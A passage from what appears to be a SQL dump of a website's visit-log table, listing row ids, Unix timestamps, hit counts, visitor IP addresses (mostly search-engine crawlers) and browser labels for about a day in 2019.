7.167.27','other'),(415973,1556519368,2,2,0,0,'40.77.167.26','other'),(415974,1556519530,2,2,0,0,'66.249.64.31','chrome'),(415975,1556519860,2,2,0,0,'34.219.50.43','chrome'),(415976,1556519863,1,1,0,0,'66.249.64.29','chrome'),(415977,1556520248,1,1,0,0,'46.211.131.180','chrome'),(415978,1556520577,1,1,0,0,'141.8.132.16','other'),(415979,1556520941,1,1,0,0,'46.211.67.233','chrome'),(415980,1556521024,1,1,0,0,'157.55.39.85','other'),(415981,1556521375,1,1,0,0,'8.29.198.26','other'),(415982,1556521376,1,1,0,0,'8.29.198.25','other'),(415983,1556522013,2,2,0,0,'157.55.39.121','other'),(415984,1556522647,1,1,0,0,'66.249.64.62','chrome'),(415985,1556523233,1,1,0,0,'40.77.167.27','other'),(415986,1556524709,1,1,0,0,'178.154.244.21','other'),(415987,1556524749,1,1,0,0,'180.76.15.16','other'),(415988,1556524862,1,1,0,0,'178.154.244.49','other'),(415989,1556524902,1,1,0,0,'178.154.171.27','other'),(415990,1556525809,1,1,0,0,'87.250.224.47','other'),(415991,1556527460,1,1,0,0,'66.249.64.31','chrome'),(415992,1556527585,1,1,0,0,'95.163.255.95','other'),(415993,1556527985,84,84,0,0,'40.77.167.27','other'),(415994,1556528183,1,1,0,0,'66.249.64.60','chrome'),(415995,1556528210,1,1,0,0,'95.163.255.159','other'),(415996,1556528255,77,77,0,0,'157.55.39.121','other'),(415997,1556528257,1,1,0,0,'95.163.255.182','other'),(415998,1556528292,93,93,0,0,'157.55.39.222','other'),(415999,1556528794,1,1,0,0,'66.249.64.30','chrome'),(416000,1556529548,2,2,0,0,'5.45.207.19','other'),(416001,1556529681,1,1,0,0,'66.249.64.58','chrome'),(416002,1556529814,1,1,0,0,'141.8.142.103','other'),(416003,1556530626,1,1,0,0,'157.55.39.121','other'),(416004,1556531376,109,109,0,0,'157.55.39.85','other'),(416005,1556532223,1,1,0,0,'8.29.198.25','other'),(416006,1556532228,1,1,0,0,'8.29.198.26','other'),(416007,1556533113,1,1,0,0,'109.74.154.72','chrome'),(416008,1556533458,1,1,0,0,'178.154.244.11','other'),(416009,1556533462,1,1,0,0,'5.45.207.19','other'),(416010,1556533656,1,1,0,0,'207.46.13.177','other'),(416011,1556533715,1,1,0,0,'95.163.255.150','other'),(416012,1556533852,1,1,0,0,'95.163.255.171','other'),(416013,1556534107,1,1,0,0,'66.249.64.58','chrome'),(416014,1556535508,2,2,0,0,'91.196.178.102','chrome'),(416015,1556535614,1,1,0,0,'91.196.178.58','chrome'),(416016,1556536344,1,1,0,0,'60.191.38.77','firefox'),(416017,1556536560,2,2,0,0,'66.249.64.29','chrome'),(416018,1556537009,1,1,0,0,'5.45.207.19','other'),(416019,1556537250,1,1,0,0,'40.77.167.80','other'),(416020,1556537341,2,2,0,0,'178.154.244.11','other'),(416021,1556538896,1,1,0,0,'60.191.38.77','firefox'),(416022,1556539346,2,2,0,0,'157.55.39.85','other'),(416023,1556539496,1,1,0,0,'207.46.13.54','other'),(416024,1556539891,1,1,0,0,'207.46.13.177','other'),(416025,1556540031,1,1,0,0,'5.45.207.19','other'),(416026,1556540475,1,1,0,0,'95.163.255.194','other'),(416027,1556540904,1,1,0,0,'95.163.255.96','other'),(416028,1556541375,1,1,0,0,'95.163.255.93','other'),(416029,1556541526,1,1,0,0,'207.46.13.54','other'),(416030,1556542199,1,1,0,0,'207.46.13.177','other'),(416031,1556543063,1,1,0,0,'8.29.198.25','other'),(416032,1556543078,1,1,0,0,'8.29.198.26','other'),(416033,1556543234,1,1,0,0,'66.249.64.30','chrome'),(416034,1556546089,1,1,0,0,'207.46.13.54','other'),(416035,1556546179,1,1,0,0,'157.55.39.3','other'),(416036,1556546334,1,1,0,0,'141.8.142.162','other'),(416037,1556546564,1,1,0,0,'87.250.224.107','other'),(416038,1556547091,1,1,0,0,'91.209.11.236','other'),(416039,1556547525,1,1,0,0,'95.163.255.94','other'),(416040,1556548163,1,1,0,0,'37.52.22.117','chrome'),(416041,1556549357,1,1,0,0,'95.108.181.54','other'),(416042,1556549405,1,1,0,0,'40.77.167.71','other'),(416043,1556550126,1,1,0,0,'66.249.64.124','chrome'),(416044,1556550393,1,1,0,0,'40.77.167.178','other'),(416045,1556551322,1,1,0,0,'180.76.15.136','other'),(416046,1556551726,1,1,0,0,'157.55.39.3','other'),(416047,1556551914,1,1,0,0,'40.77.167.178','other'),(416048,1556552532,1,1,0,0,'178.92.73.128','chrome'),(416049,1556552686,1,1,0,0,'13.66.139.0','other'),(416050,1556552859,2,2,0,0,'207.46.13.43','other'),(416051,1556553803,1,1,0,0,'40.77.167.44','other'),(416052,1556553898,2,2,0,0,'8.29.198.27','other'),(416053,1556555261,1,1,0,0,'194.31.46.73','other'),(416054,1556555428,1,1,0,0,'157.55.39.243','other'),(416055,1556555747,1,1,0,0,'37.9.113.20','other'),(416056,1556555923,1,1,0,0,'5.45.207.19','other'),(416057,1556556974,2,2,0,0,'46.211.200.86','chrome'),(416058,1556557647,1,1,0,0,'157.55.39.176','other'),(416059,1556557811,1,1,0,0,'46.211.120.205','chrome'),(416060,1556558017,1,1,0,0,'95.163.255.97','other'),(416061,1556558024,1,1,0,0,'207.46.13.43','other'),(416062,1556558313,1,1,0,0,'157.55.39.243','other'),(416063,1556558360,1,1,0,0,'93.72.131.1','chrome'),(416064,1556558593,1,1,0,0,'95.108.213.4','other'),(416065,1556559226,1,1,0,0,'141.8.142.162','other'),(416066,1556559429,1,1,0,0,'213.180.203.9','other'),(416067,1556561066,1,1,0,0,'40.77.167.178','other'),(416068,1556561649,2,2,0,0,'157.55.39.243','other'),(416069,1556562647,2,2,0,0,'40.77.167.178','other'),(416070,1556563152,1,1,0,0,'95.163.255.156','other'),(416071,1556563460,1,1,0,0,'157.55.39.243','other'),(416072,1556563498,1,1,0,0,'5.45.207.80','other'),(416073,1556563524,1,1,0,0,'141.8.183.23','other'),(416074,1556563617,1,1,0,0,'178.154.244.11','other'),(416075,1556563750,1,1,0,0,'213.180.203.17','other'),(416076,1556564074,1,1,0,0,'141.8.183.11','other'),(416077,1556564233,1,1,0,0,'40.77.167.178','other'),(416078,1556564752,1,1,0,0,'8.29.198.27','other'),(416079,1556564842,1,1,0,0,'8.29.198.25','other'),(416080,1556566119,1,1,0,0,'157.55.39.243','other'),(416081,1556566135,1,1,0,0,'178.92.73.128','chrome'),(416082,1556566498,2,2,0,0,'95.213.141.126','opera'),(416083,1556566611,1,1,0,0,'157.55.39.176','other'),(416084,1556567365,1,1,0,0,'213.180.203.17','other'),(416085,1556567627,1,1,0,0,'141.8.183.11','other'),(416086,1556567631,1,1,0,0,'178.154.200.8','other'),(416087,1556568347,1,1,0,0,'95.163.255.170','other'),(416088,1556568390,1,1,0,0,'157.55.39.122','other'),(416089,1556568535,1,1,0,0,'141.8.183.11','other'),(416090,1556568981,1,1,0,0,'95.163.255.153','other'),(416091,1556569109,1,1,0,0,'40.77.167.169','other'),(416092,1556569400,1,1,0,0,'157.55.39.122','other'),(416093,1556569683,1,1,0,0,'13.66.139.0','other'),(416094,1556570560,1,1,0,0,'40.77.167.169','other'),(416095,1556571112,1,1,0,0,'5.255.253.38','other'),(416096,1556571685,1,1,0,0,'37.9.113.148','other'),(416097,1556572429,1,1,0,0,'157.55.39.169','other'),(416098,1556574509,1,1,0,0,'95.163.255.169','other'),(416099,1556574794,1,1,0,0,'95.163.255.151','other'),(416100,1556574810,1,1,0,0,'95.163.255.174','other'),(416101,1556574821,1,1,0,0,'141.8.183.23','other'),(416102,1556575597,2,2,0,0,'8.29.198.27','other'),(416103,1556576105,1,1,0,0,'66.249.64.126','chrome'),(416104,1556576118,1,1,0,0,'66.249.64.124','chrome'),(416105,1556576400,1,1,0,0,'207.46.13.182','other'),(416106,1556576620,1,1,0,0,'207.46.13.190','other'),(416107,1556577821,1,1,0,0,'95.163.255.95','other'),(416108,1556579852,1,1,0,0,'207.46.13.182','other'),(416109,1556580068,1,1,0,0,'95.163.255.157','other'),(416110,1556581110,1,1,0,0,'207.46.13.190','other'),(416111,1556581163,1,1,0,0,'141.8.142.144','other'),(416112,1556581186,1,1,0,0,'213.180.203.48','other'),(416113,1556581310,1,1,0,0,'87.250.224.107','other'),(416114,1556582095,1,1,0,0,'207.46.13.182','other'),(416115,1556582960,1,1,0,0,'207.46.13.190','other'),(416116,1556584173,1,1,0,0,'95.108.213.4','other'),(416117,1556585232,1,1,0,0,'207.46.13.190','other'),(416118,1556586437,2,2,0,0,'8.29.198.26','other'),(416119,1556586534,1,1,0,0,'91.209.11.236','other'),(416120,1556586676,1,1,0,0,'178.154.244.49','other'),(416121,1556587053,1,1,0,0,'178.154.244.11','other'),(416122,1556587233,1,1,0,0,'207.46.13.185','other'),(416123,1556587480,1,1,0,0,'95.163.255.99','other'),(416124,1556588021,1,1,0,0,'207.46.13.182','other'),(416125,1556588104,1,1,0,0,'95.108.181.54','other'),(416126,1556589015,1,1,0,0,'109.201.154.248','other'),(416127,1556589583,1,1,0,0,'207.46.13.190','other'),(416128,1556589768,1,1,0,0,'178.154.171.69','other'),(416129,1556589905,1,1,0,0,'66.249.64.31','chrome'),(416130,1556590346,1,1,0,0,'207.46.13.182','other'),(416131,1556590597,1,1,0,0,'157.55.39.83','other'),(416132,1556590714,1,1,0,0,'207.46.13.185','other'),(416133,1556591138,1,1,0,0,'180.76.15.140','other'),(416134,1556591612,5,5,0,0,'27.0.14.26','chrome'),(416135,1556592310,2,2,0,0,'18.237.241.162','chrome'),(416136,1556592505,1,1,0,0,'95.108.213.50','other'),(416137,1556593252,1,1,0,0,'66.249.64.58','chrome'),(416138,1556593300,1,1,0,0,'141.8.142.38','other'),(416139,1556594311,2,2,0,0,'207.46.13.185','other'),(416140,1556594520,1,1,0,0,'95.163.255.154','other'),(416141,1556595045,1,1,0,0,'66.249.64.29','chrome'),(416142,1556595526,1,1,0,0,'207.46.13.187','other'),(416143,1556595694,1,1,0,0,'95.211.153.65','chrome'),(416144,1556596299,1,1,0,0,'209.17.97.50','other'),(416145,1556596848,1,1,0,0,'95.163.255.189','other'),(416146,1556596904,1,1,0,0,'66.249.64.30','chrome'),(416147,1556597274,2,2,0,0,'8.29.198.25','other'),(416148,1556598774,1,1,0,0,'66.249.64.29','chrome'),(416149,1556599124,1,1,0,0,'40.77.167.63','other'),(416150,1556599369,1,1,0,0,'207.46.13.187','other'),(416151,1556600687,1,1,0,0,'207.46.13.187','other'),(416152,1556601556,1,1,0,0,'40.77.167.63','other'),(416153,1556601671,1,1,0,0,'180.76.15.24','other'),(416154,1556601780,1,1,0,0,'141.8.142.38','other'),(416155,1556602079,1,1,0,0,'37.9.113.20','other'),(416156,1556602104,1,1,0,0,'87.250.224.118','other'),(416157,1556602156,1,1,0,0,'213.180.203.53','other'),(416158,1556602157,1,1,0,0,'51.15.235.211','other'),(416159,1556602190,1,1,0,0,'141.8.183.23','other'),(416160,1556602362,1,1,0,0,'5.255.253.16','other'),(416161,1556602368,1,1,0,0,'178.154.244.11','other'),(416162,1556602375,1,1,0,0,'207.46.13.187','other'),(416163,1556603871,1,1,0,0,'157.55.39.170','other'),(416164,1556605956,1,1,0,0,'5.255.253.25','other'),(416165,1556607410,2,2,0,0,'40.77.167.117','other'),(416166,1556607596,1,1,0,0,'46.211.131.94','chrome'),(416167,1556608119,2,2,0,0,'8.29.198.27','other'),(416168,1556608394,1,1,0,0,'66.249.64.31','chrome'),(416169,1556608430,1,1,0,0,'40.77.167.117','other'),(416170,1556608450,1,1,0,0,'66.249.64.60','chrome'),(416171,1556608778,1,1,0,0,'207.46.13.188','other'),(416172,1556609245,1,1,0,0,'176.14.249.166','msie'),(416173,1556609256,1,1,0,0,'95.28.179.118','msie'),(416174,1556609261,1,1,0,0,'94.180.158.174','msie'),(416175,1556609263,1,1,0,0,'5.228.197.20','msie'),(416176,1556609559,1,1,0,0,'66.249.64.58','chrome'),(416177,1556609745,1,1,0,0,'95.163.255.95','other'),(416178,1556609810,1,1,0,0,'40.77.167.117','other'),(416179,1556609852,1,1,0,0,'66.249.64.31','chrome'),(416180,1556610187,2,2,0,0,'157.55.39.195','other'),(416181,1556610245,1,1,0,0,'66.249.64.30','chrome'),(416182,1556610277,1,1,0,0,'178.154.200.48','other'),(416183,1556610349,1,1,0,0,'66.249.64.62','chrome'),(416184,1556610581,1,1,0,0,'207.46.13.207','other'),(416185,1556610806,1,1,0,0,'66.249.64.60','chrome'),(416186,1556611833,1,1,0,0,'213.180.203.53','other'),(416187,1556612031,1,1,0,0,'178.154.171.17','other'),(416188,1556612126,2,2,0,0,'95.108.181.54','other'),(416189,1556612147,2,2,0,0,'207.46.13.105','other'),(416190,1556612829,1,1,0,0,'37.55.236.138','chrome'),(416191,1556613545,2,2,0,0,'66.249.64.29','chrome'),(416192,1556613902,2,2,0,0,'95.108.181.83','other'),(416193,1556613942,1,1,0,0,'178.154.171.17','other'),(416194,1556613958,1,1,0,0,'66.249.64.30','chrome'),(416195,1556613977,2,2,0,0,'87.250.224.107','other'),(416196,1556614200,1,1,0,0,'141.8.142.38','other'),(416197,1556614719,1,1,0,0,'95.108.181.54','other'),(416198,1556615694,2,2,0,0,'157.55.39.181','other'),(416199,1556615864,1,1,0,0,'66.249.64.29','chrome'),(416200,1556616422,1,1,0,0,'157.55.39.195','other'),(416201,1556616462,1,1,0,0,'66.249.64.60','chrome'),(416202,1556616492,2,2,0,0,'66.249.64.58','chrome'),(416203,1556617033,1,1,0,0,'66.249.64.62','chrome'),(416204,1556617169,1,1,0,0,'66.249.64.29','chrome'),(416205,1556617812,1,1,0,0,'66.249.64.58','chrome'),(416206,1556617979,1,1,0,0,'95.108.213.4','other'),(416207,1556618035,1,1,0,0,'85.115.62.180','other'),(416208,1556618064,1,1,0,0,'141.8.142.144','other'),(416209,1556618081,1,1,0,0,'178.154.244.11','other'),(416210,1556618730,2,2,0,0,'66.249.64.31','chrome'),(416211,1556618996,1,1,0,0,'8.29.198.26','other'),(416212,1556619075,1,1,0,0,'66.249.64.62','chrome'),(416213,1556619153,1,1,0,0,'8.29.198.25','other'),(416214,1556619218,1,1,0,0,'95.163.255.192','other'),(416215,1556619424,1,1,0,0,'66.249.64.58','chrome'),(416216,1556619591,1,1,0,0,'95.163.255.187','other'),(416217,1556619604,1,1,0,0,'109.74.154.72','chrome'),(416218,1556620713,1,1,0,0,'157.55.39.195','other'),(416219,1556621006,1,1,0,0,'66.249.64.30','chrome'),(416220,1556621458,1,1,0,0,'13.66.139.0','other'),(416221,1556621534,1,1,0,0,'207.46.13.116','other'),(416222,1556621684,1,1,0,0,'95.163.255.96','other'),(416223,1556622260,1,1,0,0,'134.249.146.125','chrome'),(416224,1556622420,1,1,0,0,'66.249.64.29','chrome'),(416225,1556622823,1,1,0,0,'157.55.39.181','other'),(416226,1556623223,1,1,0,0,'95.163.255.172','other'),(416227,1556623466,1,1,0,0,'66.249.64.29','chrome'),(416228,1556623541,1,1,0,0,'66.249.64.60','chrome'),(416229,1556624198,1,1,0,0,'157.55.39.181','other'),(416230,1556624496,1,1,0,0,'66.249.64.30','chrome'),(416231,1556624687,1,1,0,0,'207.46.13.116','other'),(416232,1556624932,1,1,0,0,'95.163.255.96','other'),(416233,1556624966,1,1,0,0,'109.201.154.196','other'),(416234,1556625433,2,2,0,0,'66.249.64.62','chrome'),(416235,1556625542,1,1,0,0,'157.55.39.230','other'),(416236,1556626889,1,1,0,0,'87.250.224.118','other'),(416237,1556626892,1,1,0,0,'87.250.224.99','other'),(416238,1556626911,1,1,0,0,'178.154.171.30','other'),(416239,1556627027,1,1,0,0,'178.154.244.11','other'),(416240,1556627101,1,1,0,0,'13.66.139.0','other'),(416241,1556627129,1,1,0,0,'141.8.142.144','other'),(416242,1556627223,1,1,0,0,'5.255.253.38','other'),(416243,1556627910,1,1,0,0,'157.55.39.69','other'),(416244,1556628125,1,1,0,0,'157.55.39.181','other'),(416245,1556628502,1,1,0,0,'157.55.39.230','other'),(416246,1556628679,1,1,0,0,'37.73.165.69','chrome'),(416247,1556628738,1,1,0,0,'37.73.140.142','chrome'),(416248,1556629781,2,2,0,0,'66.249.64.60','chrome'),(416249,1556629868,1,1,0,0,'157.55.39.242','other'),(416250,1556629870,1,1,0,0,'8.29.198.26','other'),(416251,1556630027,1,1,0,0,'8.29.198.27','other'),(416252,1556630117,2,2,0,0,'66.249.64.62','chrome'),(416253,1556630356,1,1,0,0,'66.249.64.29','chrome'),(416254,1556630967,1,1,0,0,'66.249.64.31','chrome'),(416255,1556631007,1,1,0,0,'95.163.255.158','other'),(416256,1556631268,2,2,0,0,'213.180.203.17','other'),(416257,1556631412,1,1,0,0,'141.8.142.81','other'),(416258,1556631458,1,1,0,0,'178.154.171.17','other'),(416259,1556631710,1,1,0,0,'178.154.244.49','other'),(416260,1556631727,1,1,0,0,'141.8.142.144','other'),(416261,1556631755,1,1,0,0,'95.108.181.94','other'),(416262,1556631944,1,1,0,0,'52.70.146.155','firefox'),(416263,1556632322,1,1,0,0,'66.249.64.31','chrome'),(416264,1556632387,1,1,0,0,'66.249.64.29','chrome'),(416265,1556632728,1,1,0,0,'5.255.253.16','other'),(416266,1556632802,2,2,0,0,'66.249.64.30','chrome'),(416267,1556633133,2,2,0,0,'66.249.64.60','chrome'),(416268,1556634420,1,1,0,0,'91.196.179.61','chrome'),(416269,1556635605,1,1,0,0,'66.249.64.31','chrome'),(416270,1556635724,1,1,0,0,'66.249.64.58','chrome'),(416271,1556635856,1,1,0,0,'66.249.64.60','chrome'),(416272,1556636321,1,1,0,0,'207.46.13.243','other'),(416273,1556636630,1,1,0,0,'157.55.39.242','other'),(416274,1556637541,2,2,0,0,'207.46.13.90','other'),(416275,1556637592,2,2,0,0,'66.249.64.30','chrome'),(416276,1556637593,1,1,0,0,'213.180.203.53','other'),(416277,1556639326,1,1,0,0,'95.108.181.94','other'),(416278,1556639339,2,2,0,0,'178.154.200.48','other'),(416279,1556639500,2,2,0,0,'66.249.64.31','chrome'),(416280,1556639531,4,4,0,0,'66.249.64.30','chrome'),(416281,1556639587,1,1,0,0,'66.102.9.58','chrome'),(416282,1556639631,2,2,0,0,'66.249.64.29','chrome'),(416283,1556639663,1,1,0,0,'180.76.15.16','other'),(416284,1556639764,1,1,0,0,'180.76.15.156','other'),(416285,1556639850,1,1,0,0,'157.55.39.242','other'),(416286,1556640611,1,1,0,0,'95.163.255.93','other'),(416287,1556640721,2,2,0,0,'8.29.198.25','other'),(416288,1556640848,1,1,0,0,'157.55.39.242','other'),(416289,1556641938,2,2,0,0,'66.249.64.31','chrome'),(416290,1556642366,1,1,0,0,'66.249.64.29','chrome'),(416291,1556642749,1,1,0,0,'213.180.203.40','other'),(416292,1556642753,1,1,0,0,'87.250.224.107','other'),(416293,1556642792,1,1,0,0,'213.180.203.17','other'),(416294,1556643081,3,3,0,0,'157.55.39.242','other'),(416295,1556643603,1,1,0,0,'157.55.39.3','other'),(416296,1556643630,1,1,0,0,'66.249.64.62','chrome'),(416297,1556643860,1,1,0,0,'95.163.255.93','other'),(416298,1556644141,1,1,0,0,'66.249.64.31','chrome'),(416299,1556644309,2,2,0,0,'188.239.236.83','chrome'),(416300,1556645063,1,1,0,0,'66.249.64.30','chrome'),(416301,1556645265,1,1,0,0,'5.255.253.16','other'),(416302,1556645272,2,2,0,0,'157.55.39.53','other'),(416303,1556645494,2,2,0,0,'66.249.64.58','chrome'),(416304,1556645567,1,1,0,0,'66.249.64.29','chrome'),(416305,1556645613,1,1,0,0,'95.108.181.96','other'),(416306,1556645858,1,1,0,0,'157.55.39.235','other'),(416307,1556645895,1,1,0,0,'66.249.64.31','chrome'),(416308,1556645964,1,1,0,0,'5.62.63.83','firefox'),(416309,1556646135,1,1,0,0,'207.46.13.90','other'),(416310,1556646175,1,1,0,0,'141.8.142.108','other'),(416311,1556646514,1,1,0,0,'95.108.213.50','other'),(416312,1556646909,1,1,0,0,'157.55.39.217','other'),(416313,1556646944,1,1,0,0,'188.239.236.83','chrome'),(416314,1556647522,1,1,0,0,'66.249.64.29','chrome'),(416315,1556647640,1,1,0,0,'66.249.64.30','chrome'),(416316,1556648637,1,1,0,0,'157.55.39.235','other'),(416317,1556648904,1,1,0,0,'85.248.227.163','chrome'),(416318,1556648920,2,2,0,0,'197.231.221.211','chrome'),(416319,1556649052,1,1,0,0,'81.17.27.133','chrome'),(416320,1556649054,2,2,0,0,'109.70.100.21','chrome'),(416321,1556649137,1,1,0,0,'23.129.64.173','chrome'),(416322,1556649183,1,1,0,0,'185.220.102.8','chrome'),(416323,1556649185,1,1,0,0,'199.249.230.77','chrome'),(416324,1556649219,1,1,0,0,'66.249.64.29','chrome'),(416325,1556649238,1,1,0,0,'185.222.202.65','chrome'),(416326,1556649314,1,1,0,0,'37.9.113.38','other'),(416327,1556649315,2,2,0,0,'66.249.64.31','chrome'),(416328,1556649378,1,1,0,0,'5.45.207.80','other'),(416329,1556649653,2,2,0,0,'66.249.64.30','chrome'),(416330,1556649782,1,1,0,0,'199.249.230.76','chrome'),(416331,1556649785,1,1,0,0,'23.129.64.156','chrome'),(416332,1556650197,1,1,0,0,'82.145.210.45','other'),(416333,1556650214,1,1,0,0,'23.129.64.154','chrome'),(416334,1556650275,1,1,0,0,'95.163.255.97','other'),(416335,1556650495,1,1,0,0,'199.249.230.70','chrome'),(416336,1556650763,1,1,0,0,'95.163.255.96','other'),(416337,1556650767,1,1,0,0,'66.249.64.31','chrome'),(416338,1556651236,1,1,0,0,'185.220.100.252','chrome'),(416339,1556651335,2,2,0,0,'66.249.64.30','chrome'),(416340,1556651488,1,1,0,0,'66.249.64.29','chrome'),(416341,1556651510,1,1,0,0,'157.55.39.53','other'),(416342,1556651595,1,1,0,0,'8.29.198.25','other'),(416343,1556651693,1,1,0,0,'66.249.64.31','chrome'),(416344,1556651764,1,1,0,0,'8.29.198.27','other'),(416345,1556652980,1,1,0,0,'5.45.207.79','other'),(416346,1556653674,1,1,0,0,'37.9.113.148','other'),(416347,1556654547,2,2,0,0,'66.249.64.30','chrome'),(416348,1556654549,1,1,0,0,'5.45.207.79','other'),(416349,1556655244,1,1,0,0,'95.163.255.93','other'),(416350,1556655533,1,1,0,0,'66.249.64.58','chrome'),(416351,1556655754,2,2,0,0,'178.154.244.11','other'),(416352,1556655999,1,1,0,0,'5.45.207.79','other'),(416353,1556656128,1,1,0,0,'95.163.255.94','other'),(416354,1556656891,1,1,0,0,'40.77.167.166','other'),(416355,1556657237,2,2,0,0,'66.249.64.31','chrome'),(416356,1556657859,1,1,0,0,'40.77.167.0','other'),(416357,1556657894,1,1,0,0,'66.249.64.29','chrome'),(416358,1556658266,1,1,0,0,'66.249.64.58','chrome'),(416359,1556658925,1,1,0,0,'5.45.207.79','other'),(416360,1556658982,2,2,0,0,'5.45.207.19','other'),(416361,1556659144,1,1,0,0,'178.154.244.11','other'),(416362,1556659750,1,1,0,0,'46.246.65.213','firefox'),(416363,1556659936,1,1,0,0,'64.246.165.170','firefox'),(416364,1556660383,1,1,0,0,'40.77.167.173','other'),(416365,1556660451,1,1,0,0,'40.77.167.0','other'),(416366,1556660900,1,1,0,0,'66.249.64.31','chrome'),(416367,1556661004,1,1,0,0,'207.46.13.16','other'),(416368,1556661897,1,1,0,0,'87.250.224.65','other'),(416369,1556662161,1,1,0,0,'95.163.255.93','other'),(416370,1556662382,1,1,0,0,'66.249.64.31','chrome'),(416371,1556662456,1,1,0,0,'8.29.198.26','other'),(416372,1556662522,1,1,0,0,'66.249.64.30','chrome'),(416373,1556662633,1,1,0,0,'8.29.198.25','other'),(416374,1556662713,1,1,0,0,'66.249.64.29','chrome'),(416375,1556663915,2,2,0,0,'66.249.64.31','chrome'),(416376,1556664237,1,1,0,0,'66.249.64.60','chrome'),(416377,1556664610,1,1,0,0,'40.77.167.0','other'),(416378,1556664768,1,1,0,0,'66.249.64.29','chrome'),(416379,1556664904,1,1,0,0,'95.163.255.98','other'),(416380,1556664952,1,1,0,0,'66.249.64.31','chrome'),(416381,1556665438,1,1,0,0,'207.46.13.16','other'),(416382,1556665680,1,1,0,0,'95.163.255.185','other'),(416383,1556665890,1,1,0,0,'66.249.64.62','chrome'),(416384,1556665925,2,2,0,0,'66.249.64.31','chrome'),(416385,1556666682,1,1,0,0,'66.249.64.29','chrome'),(416386,1556667017,1,1,0,0,'66.249.64.31','chrome'),(416387,1556668161,3,3,0,0,'40.77.167.0','other'),(416388,1556668565,1,1,0,0,'66.249.64.29','chrome'),(416389,1556669146,1,1,0,0,'180.76.15.152','other'),(416390,1556670001,1,1,0,0,'66.249.64.31','chrome'),(416391,1556670193,1,1,0,0,'141.8.142.103','other'),(416392,1556670223,1,1,0,0,'213.180.203.61','other'),(416393,1556670373,1,1,0,0,'66.249.64.29','chrome'),(416394,1556670788,1,1,0,0,'66.249.64.30','chrome'),(416395,1556671402,1,1,0,0,'95.163.255.155','other'),(416396,1556671405,1,1,0,0,'95.163.255.195','other'),(416397,1556671775,3,3,0,0,'82.117.240.50','firefox'),(416398,1556672230,2,2,0,0,'66.249.64.31','chrome'),(416399,1556672469,2,2,0,0,'5.45.207.79','other'),(416400,1556672531,1,1,0,0,'95.108.213.4','other'),(416401,1556672937,1,1,0,0,'207.46.13.10','other'),(416402,1556673303,1,1,0,0,'8.29.198.27','other'),(416403,1556673492,1,1,0,0,'8.29.198.26','other'),(416404,1556673508,1,1,0,0,'66.249.64.29','chrome'),(416405,1556673693,2,2,0,0,'66.249.64.31','chrome'),(416406,1556673875,1,1,0,0,'66.249.64.30','chrome'),(416407,1556674384,1,1,0,0,'209.17.97.10','other'),(416408,1556674466,1,1,0,0,'5.45.207.19','other'),(416409,1556674575,1,1,0,0,'5.188.210.44','chrome'),(416410,1556675161,3,3,0,0,'66.249.64.30','chrome'),(416411,1556675599,1,1,0,0,'66.249.64.31','chrome'),(416412,1556676496,1,1,0,0,'5.45.207.79','other'),(416413,1556676580,1,1,0,0,'207.46.13.127','other'),(416414,1556676583,3,3,0,0,'66.249.64.30','chrome'),(416415,1556676705,1,1,0,0,'141.8.142.103','other'),(416416,1556677008,2,2,0,0,'54.68.103.163','chrome'),(416417,1556677077,1,1,0,0,'157.55.39.214','other'),(416418,1556677573,1,1,0,0,'95.163.255.159','other'),(416419,1556678249,1,1,0,0,'207.46.13.126','other'),(416420,1556678270,1,1,0,0,'66.249.64.58','chrome'),(416421,1556679675,1,1,0,0,'207.46.13.127','other'),(416422,1556679797,2,2,0,0,'66.249.64.31','chrome'),(416423,1556679909,1,1,0,0,'66.249.64.30','chrome'),(416424,1556680198,1,1,0,0,'95.108.213.4','other'),(416425,1556680205,1,1,0,0,'66.249.64.58','chrome'),(416426,1556680327,1,1,0,0,'5.45.207.79','other'),(416427,1556680491,1,1,0,0,'5.45.207.19','other'),(416428,1556680843,1,1,0,0,'207.46.13.161','other'),(416429,1556680931,2,2,0,0,'66.249.64.30','chrome'),(416430,1556680958,1,1,0,0,'178.154.244.11','other'),(416431,1556680971,1,1,0,0,'66.249.64.60','chrome'),(416432,1556681131,1,1,0,0,'66.249.64.31','chrome'),(416433,1556681155,1,1,0,0,'66.249.64.29','chrome'),(416434,1556682006,1,1,0,0,'207.46.13.159','other'),(416435,1556682248,1,1,0,0,'66.249.64.30','chrome'),(416436,1556682287,1,1,0,0,'207.46.13.162','other'),(416437,1556682321,1,1,0,0,'165.227.132.109','firefox'),(416438,1556682525,1,1,0,0,'207.46.13.161','other'),(416439,1556683292,1,1,0,0,'66.249.64.31','chrome'),(416440,1556683460,1,1,0,0,'207.46.13.161','other'),(416441,1556683817,1,1,0,0,'178.154.244.11','other'),(416442,1556684154,1,1,0,0,'8.29.198.25','other'),(416443,1556684155,1,1,0,0,'104.148.64.26','chrome'),(416444,1556684343,1,1,0,0,'8.29.198.26','other'),(416445,1556684378,1,1,0,0,'178.154.244.65','other'),(416446,1556684529,1,1,0,0,'207.46.13.162','other'),(416447,1556684852,1,1,0,0,'95.163.255.95','other'),(416448,1556684929,1,1,0,0,'207.46.13.127','other'),(416449,1556685193,1,1,0,0,'66.249.64.29','chrome'),(416450,1556685537,1,1,0,0,'66.249.64.31','chrome'),(416451,1556685893,1,1,0,0,'207.46.13.162','other'),(416452,1556686019,1,1,0,0,'212.90.49.192','chrome'),(416453,1556686495,1,1,0,0,'207.46.13.161','other'),(416454,1556686578,4,4,0,0,'66.249.64.30','chrome'),(416455,1556686585,1,1,0,0,'207.46.13.217','other'),(416456,1556687025,1,1,0,0,'66.249.64.29','chrome'),(416457,1556687399,1,1,0,0,'95.163.255.167','other'),(416458,1556687778,1,1,0,0,'5.45.207.79','other'),(416459,1556687961,3,3,0,0,'178.154.244.11','other'),(416460,1556688093,1,1,0,0,'5.45.207.19','other'),(416461,1556688399,1,1,0,0,'66.249.64.30','chrome'),(416462,1556688493,1,1,0,0,'66.249.64.62','chrome'),(416463,1556688513,1,1,0,0,'185.220.102.7','other'),(416464,1556688772,1,1,0,0,'207.46.13.217','other'),(416465,1556689858,1,1,0,0,'46.246.65.213','firefox'),(416466,1556689905,1,1,0,0,'207.46.13.217','other'),(416467,1556689908,1,1,0,0,'95.163.255.194','other'),(416468,1556690628,1,1,0,0,'66.249.64.30','chrome'),(416469,1556690989,1,1,0,0,'207.46.13.217','other'),(416470,1556691363,1,1,0,0,'207.46.13.159','other'),(416471,1556691437,1,1,0,0,'185.120.89.176','chrome'),(416472,1556691464,1,1,0,0,'5.45.207.19','other'),(416473,1556691545,1,1,0,0,'66.249.64.29','chrome'),(416474,1556691763,2,2,0,0,'207.46.13.161','other'),(416475,1556692142,1,1,0,0,'66.249.64.30','chrome'),(416476,1556692203,1,1,0,0,'178.154.244.11','other'),(416477,1556692595,1,1,0,0,'5.45.207.